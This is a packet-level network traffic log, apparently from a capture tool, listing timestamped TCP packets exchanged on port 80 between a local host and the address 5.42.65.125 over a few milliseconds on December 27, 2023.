Dec 27, 2023 17:57:25.825037956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825048923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825061083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825073957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825076103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.825088978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825102091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825107098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.825114965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825125933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.825149059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.825738907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825742960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.825797081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.825896978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825910091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825922966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825936079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825948954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825962067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.825962067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825975895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.825977087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.826004028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.826644897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.826680899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.826690912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.826730013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.826742887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.826755047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.826785088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.826786041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.826798916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.826858997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.826898098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.827656031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827688932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827728033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827733994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.827764034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.827800035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827814102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827826023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827848911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827860117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.827861071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827876091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827882051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.827889919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.827912092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.828648090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.828680038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.828691006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.828742027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.828797102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.828809977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.828821898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.828835011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.828840017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.828847885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.828859091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.828875065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.829730034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.829744101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.829756021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.829787016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.829813004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.829941988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.829956055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830003023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.830018997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830033064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830075979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.830081940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830399990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830442905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.830493927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830507994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830519915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830532074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830538988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.830544949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830558062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830564976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.830571890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.830595970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.831295013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.831309080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.831321955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.831350088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.831366062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.831368923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.831394911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.831449986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.831463099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.831475019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.831486940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.831501961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.832282066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.832295895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.832308054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.832320929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.832333088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.832335949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.832348108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.832355022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.832362890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.832371950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.832408905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.832453966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.833092928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833106041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833151102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.833221912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833235979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833247900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833261967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.833280087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.833317041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833329916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833343029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833370924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.833409071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833452940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.833492041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833504915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.833537102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.834228992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834244013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834273100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834278107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.834285975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834301949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834336996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.834449053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834461927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834474087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834487915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.834495068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.834507942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.835238934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835277081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835289001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835319042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.835320950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835351944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.835357904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835381031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835412025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.835437059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835448980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835459948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.835481882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.835496902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.836294889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836308002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836333990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836345911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836345911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.836358070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836390018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.836429119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836441994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836452961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836463928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.836486101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.836498976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.837402105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837414980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837425947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837438107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837450027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837462902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837462902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.837476969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837490082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.837490082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.837491989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837505102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.837519884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.837547064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.838088036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838120937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838131905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838145018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838157892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.838174105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.838181973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838653088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838669062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838680029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838690042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838704109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838709116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.838716030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838721991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.838728905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838742971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838747025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.838757992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.838761091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.838789940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.839622021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839634895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839646101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839657068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839673996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.839693069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.839716911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839729071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839739084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839750051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839755058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.839762926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.839782953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.840748072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840761900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840771914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840806007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.840812922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840821028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.840826988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840837955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840862036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.840873957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840888023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840898991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.840909958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.840933084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.841609001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841622114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841633081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841644049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841654062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841656923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.841665030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841675997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.841676950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841689110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841697931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.841701984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.841721058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.842478037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842519999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842581034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.842664957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842680931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842700005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842710018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.842711926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842725039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842734098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.842739105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842751980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.842761040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.842796087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.843384027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.843419075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.843431950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.843444109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.843455076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.843463898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.843477964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.844065905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844086885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844099998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844130039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.844144106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.844185114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844199896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844211102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844223022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844234943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844238043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.844249010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844264030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.844284058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.844928980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844945908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844957113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844970942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844981909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.844996929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.845015049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.845043898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.845057011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.845073938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.845087051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.845096111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.845113039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.845976114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.845989943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846031904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.846050024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846062899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846074104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846086025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.846087933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846111059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.846115112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846144915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846158028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.846168995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846887112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846899033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846910954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846923113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846930027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.846935034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846950054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846956015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846961975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846965075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.846975088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.846986055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.847002983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.847645044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847722054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847733974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847743988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847754955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847763062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.847767115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847781897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.847795010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.847822905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847836971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847846985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.847860098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.847881079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.848783016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.848836899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.848849058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.848860025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.848891973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.848900080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.848926067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.849195957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.849209070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.849220991 CET	80	49738	5.42.65.125	192.168.2.4
